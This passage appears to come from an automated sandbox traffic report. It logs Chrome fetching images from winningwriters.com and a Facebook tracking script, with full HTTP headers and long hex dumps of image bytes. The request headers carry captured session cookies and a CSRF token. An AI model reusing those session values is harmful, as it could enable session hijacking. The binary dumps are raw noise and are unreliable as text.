                                                                                                                                                                                            Data Ascii: vZ8QU%-{YYW]" Cc7]eCpN1%#nl\X,2^^xU,z`2@@:w*TF{%1%_\@{}SHGFH.R+6S1rL7FbmzF5gHxL!Wuru@BF?@ild]3"AdTDb<CC%3yCN@
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: b5 4c e6 6c f1 f1 ea 56 50 c5 44 be fd 24 53 93 32 af ce 36 a2 6a b2 b2 c5 48 a6 0d da db e1 e1 36 cf 39 ea 3e a5 8d b8 bd 44 ca 46 51 57 47 12 90 d4 2f b7 5d 66 2e 22 82 d4 f9 fb 7d ea 2b 99 12 a4 5e 86 1a a3 f4 eb 38 e5 5b 0d 00 c9 c8 5a 8d 74 b2 65 b6 e1 52 e8 85 a6 a9 93 36 36 61 42 ec a5 fd c0 f1 d5 2d 9b 2b 70 2e 00 3a 53 bd 35 5b 33 62 b4 2b 00 07 fc fa ad b3 2a 31 45 72 80 7b 34 8c cc 82 45 c1 0b ff 00 3e aa 93 33 ad c0 ba 29 7d dd bb 6a 96 cd 85 b8 17 49 f6 ed aa a4 6c 6c ad 0c 92 41 d0 35 89 36 6f b1 e3 a1 91 4c bd ba 6b 1a 4c de 59 81 76 90 75 af b3 54 cd 9b 3c 78 eb 53 22 88 54 43 58 b3 37 98 aa ac ca a2 5e a1 ac 3b 8c e8 f1 61 a9 99 6e 50 e8 3a c1 b8 ce af 0a df 69 92 2f 60 d6 2b 37 d6 de 84 44 6b f4 ea 12 26 4e a5 3d c3 a7 a1 4f 88 c9 44 7a
                                                                                                                                                                                            Data Ascii: LlVPD$S26jH69>DFQWG/]f."}+^8[ZteR66aB-+p.:S5[3b+*1Er{4E>3)}jIllA56oLkLYvuT<xS"TCX7^;anP:i/`+7Dk&N=ODz
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: d2 e6 e8 86 e3 05 f7 8e af de 76 72 82 2a 3d 83 cc d9 72 35 be 11 c7 76 f5 bc bc 8b 62 3b 45 bb 44 d8 c5 ca a8 2b 1d 13 95 60 45 50 53 69 0e 41 15 44 4c 24 29 2a 23 5b 81 7b 2b 21 73 a6 a3 1e cd 2a 73 5f 97 b6 a7 0b 2e 08 7e 3a de fc 0e 8d bb 22 12 c8 cd a5 e2 b2 76 1c ba a4 9b ce 5c 70 d7 64 6b e6 c2 99 11 51 83 74 0a bb 47 48 48 22 0d 54 2a 75 50 48 70 10 2a 85 39 0b 44 da 3a 1d b9 5f ac 95 da 69 c1 ae 14 3a 25 9e 78 0b c3 0f 4a dc 6f 87 4b cf 58 7b b3 93 3c c0 cc b1 01 70 0f 1a 2d 3b 95 9d 9b 6c da 50 c7 54 5b 97 ef 59 90 61 26 ed 75 c5 62 1d 22 19 b9 00 86 3a 6a 94 03 69 0a a1 e2 69 47 8f 13 1b 0b 33 23 36 6f c1 a4 6d c7 4a b5 56 df a1 68 6e 18 a3 d3 53 87 7e a7 bc 66 cb f9 73 d3 99 0b b3 07 f2 83 01 a0 47 77 df 11 ee c9 b6 b7 64 6c cb 45 d2 59 76 df
                                                                                                                                                                                            Data Ascii: vr*=r5vb;ED+`EPSiADL$)*#[{+!s*s_.~:"v\pdkQtGHH"T*uPHp*9D:_i:%xJoKX{<p-;lPT[Ya&ub":jiiG3#6omJVhnS~fsGwdlEYv


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            22192.168.2.164973666.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC906OUTGET /assets/images/social-sprite-2020.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Tue, 09 Mar 2021 17:09:44 GMT
                                                                                                                                                                                            ETag: "1092-5bd1d9de0a600"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 4242
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4242INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 16 08 06 00 00 00 22 b1 65 3a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 23 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDR"e:tEXtSoftwareAdobe ImageReadyqe<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            23192.168.2.164974066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC885OUTGET /graphics/home_page_slide_victor.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 15 Feb 2024 15:10:16 GMT
                                                                                                                                                                                            ETag: "1ab8e-6116d065b93bb"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 109454
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:06 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 66 33 35 34 65 66 63 37 30 2c 20 32 30 32 33 2f 31 31 2f 30 39 2d 31 32 3a 30 35 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: 28 09 4a 50 14 09 09 48 90 18 08 0b 74 8e 13 18 72 f6 c0 37 89 e1 3f eb 80 3a 71 e0 38 98 06 cb 0e 67 97 b6 50 0e cb 86 72 9e 50 07 b8 ce 79 65 ed 80 07 c3 90 c7 32 30 10 00 4c 03 2c 75 1c bb b0 80 24 4c 93 ff 00 47 8f ba 01 61 81 32 c3 1e 59 f7 c0 09 93 e1 09 c7 9c b0 f7 40 12 09 e1 2c 71 80 00 4e 7c b8 fe 98 40 1d 39 f3 c2 01 70 00 09 48 c0 45 fd 67 97 fa 6d ba 3b 11 49 23 fe f3 a5 80 d0 69 48 c0 29 fb 46 13 80 20 99 76 1c fe a8 05 ac 8c 39 40 2d 66 00 49 53 d5 2e d8 07 f8 86 20 62 73 80 1a c8 32 56 1c e0 1d ad 3c e0 1a 32 4c b1 22 78 40 2d 4a 9c a5 8c 03 81 38 ea 12 94 00 c0 85 63 e1 3c 60 1a 34 8f 84 cc f0 10 0e d4 47 c5 87 28 05 20 a3 d9 c2 00 11 a6 52 c4 98 07 14 02 67 00 25 a4 12 33 80 53 5f 28 02 35 71 12 e5 00 4e 00 98 0a 45 64 89 40 48 d3 6f fd
                                                                                                                                                                                            Data Ascii: (JPHtr7?:q8gPrPye20L,u$LGa2Y@,qN|@9pHEgm;I#iH)F v9@-fIS. bs2V<2L"x@-J8c<`4G( Rg%3S_(5qNEd@Ho
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: 52 58 49 09 c1 2e 1d 44 cb 86 02 03 21 f5 17 bd 1a a5 b2 d0 74 de 9d 5a 58 b8 6a a9 b9 d4 26 53 6d 0d ba 0b 4d 24 4b 8e 90 4c b2 ca 03 55 ee 34 ec 54 d8 ed f5 4e fd d3 de 57 95 5b 54 0a 43 80 17 d4 a0 a4 83 30 09 4f eb 80 c2 1f a5 b9 dd ab e8 28 ac 7a 15 f3 32 f3 1a 70 fd c2 18 42 81 d4 a0 7b 64 25 01 92 b1 6b 75 c1 47 45 5d 78 f9 9a 94 17 d5 f7 c4 eb 5a 8a ca 94 a2 4c 88 92 44 91 21 20 98 09 03 6a 58 99 55 11 a9 71 c4 b6 14 a2 dd ba 99 dd 29 f9 87 65 a9 4e 2d 60 ea 22 46 49 07 01 c2 02 7d d9 fb 4d a6 2e 74 d5 40 fc dd 5b 69 5a 94 d2 d6 b4 a3 50 18 b4 92 a2 50 48 18 6a 57 b2 03 65 a9 6d 77 0a b4 5b d1 52 f3 ed 52 2d 6a 7d 8a 55 b6 94 2c 36 c1 01 47 0c 0a 34 ca 4a 24 02 25 01 24 2e c4 29 ad a8 a5 65 b5 bc f5 c7 49 a7 64 a9 4a 65 0a 74 95 02 ac 53 a4 14 82
                                                                                                                                                                                            Data Ascii: RXI.D!tZXj&SmM$KLU4TNW[TC0O(z2pB{d%kuGE]xZLD! jXUq)eN-`"FI}M.t@[iZPPHjWemw[RR-j}U,6G4J$%$.)eIdJetS
                                                                                                                                                                                            2024-11-18 20:00:06 UTC8000INData Raw: bf e5 d2 52 9f 31 20 17 9c 5b 84 12 14 a2 34 24 0e c9 67 01 91 54 d6 a6 96 d6 87 29 6a c3 4d 5b d6 95 52 50 be d7 90 ad 29 3a 9c 5a 54 42 be 30 4c d4 4c fb a0 32 4b 2d d6 c1 54 db ad 25 87 18 6e b5 08 5b ee f9 6a 59 d2 b5 c9 24 29 ad 47 4a d2 08 49 38 ce 7d 90 19 cd 3d 0f ce dc 19 79 aa b6 93 6d a6 9b cd 5b 82 93 e2 43 4d e9 6c 89 a9 27 52 09 91 96 12 cf 18 09 36 c1 64 72 9d 56 d7 de 08 6a be e6 85 16 da 4a 90 1b f3 16 3c 3a 74 93 90 03 3c 86 78 e3 01 91 37 6e 34 d5 0d d2 fe 32 95 55 a1 45 0e 3e a5 b6 52 8f 2c 80 a1 89 1e 22 af b4 70 f6 40 64 0b a1 35 b4 a5 ba 6a c4 d5 2d 0a f1 3c 1d 69 d0 87 4f 88 0d 4d 92 67 c3 1c 66 65 01 8d ff 00 23 5f 56 2e 55 b4 4f b4 a7 dd 20 50 14 3e 5c 69 b0 84 8f 16 a6 bc 5a e7 e1 52 72 1c 44 05 7b 65 9e fd 6f a5 ab ab bc b1 e5
                                                                                                                                                                                            Data Ascii: R1 [4$gT)jM[RP):ZTB0LL2K-T%n[jY$)GJI8}=ym[CMl'R6drVjJ<:t<x7n42UE>R,"p@d5j-<iOMgfe#_V.UO P>\iZRrD{eo
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: ec f7 58 64 79 9e 4d ea c9 65 be 59 9b a5 57 c2 d2 d7 47 50 cb 8c ba 84 28 79 80 29 c2 95 9c c4 ce 01 b6 5d 3f f5 e7 e9 b3 73 d3 52 6d eb ef 57 6a 9d 7a 9d a6 91 43 53 b8 16 8b 45 62 2a 5a 51 52 9b 15 14 2d d3 91 42 a5 28 2a 52 2f b7 88 29 71 22 6a 09 bf 66 f5 3f a6 b7 9a 5b 7d 8a d5 6e 16 da fa 5a 97 6e 16 4a c6 6f 14 ae 5b 2b 98 b8 a9 26 b1 8a 3a ca 25 a9 3e 7a 16 84 bf 4c f3 88 6c b8 0a d2 bc 4a 44 06 ee ed 1d f6 2d 15 9f 2f 4d 7a ab 0f 6d c9 ae 81 fb a2 03 0e b4 29 66 a4 39 42 f3 53 48 66 a1 04 a2 a5 82 56 d4 e4 b4 c8 12 12 13 60 bd 5b a8 ef d6 a6 d8 bd 8a db 4a 5e 75 ca 17 c0 0d be b4 38 a4 ac 6a 2c 13 a7 cb 52 b4 24 8c 15 29 0c 0c 04 d7 b6 ee bf 8d 79 46 dc b5 14 af c3 4e f9 73 cc 0f b8 b7 49 50 5e 7a 48 d0 70 02 44 11 01 31 ee 2d c2 c6 d4 db 34 d4
                                                                                                                                                                                            Data Ascii: XdyMeYWGP(y)]?sRmWjzCSEb*ZQR-B(*R/)q"jf?[}nZnJo[+&:%>zLlJD-/Mzm)f9BSHfV`[J^u8j,R$)yFNsIP^zHpD1-4
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: d9 3c 20 0e b4 f3 80 0a 20 a4 c8 c0 53 12 80 22 53 38 40 09 c0 11 df 38 03 29 e3 c3 94 04 65 d6 3c 3a 6b ba 8e 52 69 9f fe 94 d4 a0 39 ea a7 47 9b 88 c8 82 71 cf 10 78 40 64 8d 3b 36 f1 3a 94 0a b1 ef 18 4b b3 ba 02 ad 3b 84 68 90 91 51 90 13 00 4b 2e 30 1e b7 d5 96 18 9f 09 94 81 c7 b0 81 98 39 c0 61 9b 7d a5 2b 7c dc 12 47 80 37 30 4e 59 c8 fd 59 c0 6b e7 5c f7 0b 0e 57 2a cd 4f 27 17 50 ad 0d 4c 4e 7a 8c b9 c0 48 3d 3a a0 76 d1 b6 5b 55 c9 67 c9 6c 00 92 01 4e a5 cb ee d2 92 9e 67 02 20 2c 9b 95 84 37 4f 50 fb 89 6d 08 49 69 0e 2c 62 7c c7 dc fb c9 eb c8 4c 88 0f 4e cf b2 dc 5f b2 f5 8a 94 b2 ba aa 9b 15 f3 66 ee 76 69 19 33 7d 76 7b fd b2 ab 6b bc e4 9c 33 08 45 5d 13 69 56 39 11 01 21 b3 6f b7 5e 29 aa ad f7 1a 77 dc a3 4e 54 94 45 6f 3a b0 a6 fc b2
                                                                                                                                                                                            Data Ascii: < S"S8@8)e<:kRi9Gqx@d;6:K;hQK.09a}+|G70NYYk\W*O'PLNzH=:v[UglNg ,7OPmIi,b|LN_fvi3}v{k3E]iV9!o^)wNTEo:
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: d8 45 08 55 40 3f d9 5b 42 5c 60 3a 19 d0 2f cc 4b d2 2e df f4 e7 b7 bd 01 7a e9 f4 75 59 d3 1b 0e da b5 3f 6c bc ee 5a 4b 23 75 75 4a af 73 cd 52 6f 75 96 fb 8a 28 ee 4d 5c 1b 79 cf 3b 53 0f a8 12 99 69 29 9a 60 36 de bf f2 bb d8 9e a6 bd 2e fa 5d dc d6 1b f6 cf ea 27 5a fa 4c e9 b5 6f 1e a5 32 ed e2 c5 6d ea 66 ce 62 a5 6b 66 df 7d f3 69 d1 5d 6f bd 52 51 b8 d2 5b 75 f6 4a d2 00 4a 8a d1 e5 aa 03 a3 5e 8a fd 3c 75 a7 d2 be c5 ba f4 37 7a 75 12 d7 d5 7e 8c 6d aa a7 de e8 25 fd 6a ad 46 eb b3 5a ea 57 e7 0b 3d c9 b7 9b f2 56 cd 3c e4 d2 9a 71 40 12 a2 90 94 10 90 1b 93 80 90 13 99 96 1c 3e b8 03 39 8f 87 1e 46 5f b6 00 f1 e6 47 7e 1f 44 01 99 23 1c 0f b6 02 81 f8 bb 41 c6 02 f3 b6 b6 e6 e0 de 57 fb 76 d5 da 76 5a ad c7 b8 af 0a 2d da ec d4 4c 2e a2 a1 e5
                                                                                                                                                                                            Data Ascii: EU@?[B\`:/K.zuY?lZK#uuJsRou(M\y;Si)`6.]'ZLo2mfbkf}i]oRQ[uJJ^<u7zu~m%jFZW=V<q@>9F_G~D#AWvvZ-L.
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 38 01 90 33 9f d9 80 04 81 c6 52 cc 40 1e 72 1c 71 80 53 04 67 8f 13 94 03 54 a4 b6 8f 35 c3 e5 36 3e 27 15 80 13 ed 30 18 be f5 df 5b 4f a7 3b 17 73 75 43 7b 5d 1d b2 f4 ef 65 b4 9a 8d d7 bb 9b b7 dd 2e 54 d4 4d 2d c0 ca 0a d3 69 a6 aa 5c d6 a2 12 90 12 66 79 0c 60 39 7f b0 7f 3b bf cb eb 7b f5 a6 8f a6 77 cd dd b9 ba 5d d3 1a b9 32 3d 4a 5d 76 fd 45 65 91 ba d5 2c 21 28 7e d5 6c 53 97 06 a9 c8 54 fc f2 82 47 da 6c 08 0f ad 1f 4a be 8d 3d 1e f5 d3 63 6d fe ac 6c af 51 4c 7a aa d8 b7 20 cd 4d 2d cb 6c 5d ad ed 6d fa 90 a0 16 96 1f fc 25 c7 aa 04 a4 42 db 5b c8 5f 05 81 22 20 3a fd b6 b6 ae db d9 f6 3b 7e db da d6 1a 3d bb 61 b5 20 37 6f b3 d1 53 b7 4f 4c ca 73 3a 10 d8 00 4c 99 93 99 38 9c 60 2f c9 09 90 d2 04 8e 52 80 74 02 80 50 0d 26 47 1e 38 0f d0 40
                                                                                                                                                                                            Data Ascii: 83R@rqSgT56>'0[O;suC{]e.TM-i\fy`9;{w]2=J]vEe,!(~lSTGlJ=cmlQLz M-l]m%B[_" :;~=a 7oSOLs:L8`/RtP&G8@
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 50 0b 9e 1d d0 08 63 c2 7d be e8 05 d9 38 08 9f ae 66 5d 29 de 04 f8 be e9 89 4f 8f f7 c6 79 c0 72 ee bc e9 04 7c 44 4a 62 40 e9 1e ce 38 e5 01 63 04 02 b0 46 a0 55 8a 41 99 12 e1 2c 20 3c a5 d0 5e 48 49 27 ef 26 47 3c c4 05 c5 87 06 94 a9 59 f8 a5 2c 8a 4f b0 91 01 75 6d e4 78 42 8e 04 09 a8 e4 31 f6 ce 02 4c da ce 05 2d b0 48 48 20 67 cc 61 8c a0 36 47 6d 2c 94 b6 52 b2 4a 44 d4 06 33 e3 01 12 dc 69 dc db 3d 50 ac 46 8f 26 82 f1 e5 be 95 10 4a 74 b8 66 a9 10 70 99 98 30 1b 54 d5 bd 75 b7 1d 9f 5f 4a 57 46 cb c5 90 e9 41 08 08 61 2e 00 55 a8 73 4e 13 38 c0 74 d3 a1 57 5a 4a 3d e1 6f a8 ab 59 71 87 da 2c d0 be 56 12 94 a5 04 85 28 84 cc 10 bd 7a 89 30 1b 91 74 b3 b5 6a 66 f7 72 a6 4a 9c 45 6a 95 50 96 34 05 25 6f 38 9d 0e 29 20 91 24 89 63 8f 64 06 9f 6f
                                                                                                                                                                                            Data Ascii: Pc}8f])Oyr|DJb@8cFUA, <^HI'&G<Y,OumxB1L-HH ga6Gm,RJD3i=PF&Jtfp0Tu_JWFAa.UsN8tWZJ=oYq,V(z0tjfrJEjP4%o8) $cdo
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: a1 a5 48 5a 1c 05 2b 42 86 0a 4a 81 04 60 66 30 80 f9 f7 fc c4 3f 24 ed a3 d5 3a 1d c9 d6 6f 46 d6 ea 4d 9d d4 e2 5d ae dd 7d 04 f0 52 d9 ef 8a 0a f3 16 ed 89 6a 21 14 75 6b cb e5 0f dd 38 7e 02 83 e1 21 f2 5d b8 36 d5 fb 6a 5e 6e 3b 77 72 5a 2a 2c 7b 82 ce fb 94 b7 9b 1d 5b 0e d3 d6 51 d5 34 b2 da d9 7d 97 92 95 a1 c4 90 41 49 10 16 ef b9 0c b8 80 e2 83 aa 52 40 44 e4 93 94 c9 39 10 0c e5 01 21 f4 cf ab 3d 4e e9 0d fd cd c9 d3 0e a4 5e 7a 6d 7e 14 ae d2 bd 7c b1 5c 6a 6d b5 6e d2 bb a4 ad 85 3b 4a b6 d4 b4 12 07 84 92 30 c2 03 af 7e 81 ba 53 eb 8f f3 0e ba ef d4 db bd 7a 6e 0d 87 b4 f6 22 29 07 51 6a 6b b7 6e e0 b8 5e 96 dd ce 68 6d 74 d6 ca 6a 86 d6 b6 16 52 5b 53 cb 71 08 4a e4 93 89 13 0f a7 cf 48 fe 8e 7a 55 e8 b7 60 ee 0d 89 d3 6b a5 db 76 5d 37 bd
                                                                                                                                                                                            Data Ascii: HZ+BJ`f0?$:oFM]}Rj!uk8~!]6j^n;wrZ*,{[Q4}AIR@D9!=N^zm~|\jmn;J0~Szn")Qjkn^hmtjR[SqJHzU`kv]7


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            24192.168.2.1649738157.240.0.64436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC539OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                            Host: connect.facebook.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                            content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-C9RY4CIf' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                            document-policy: force-load-at-top
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1672INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
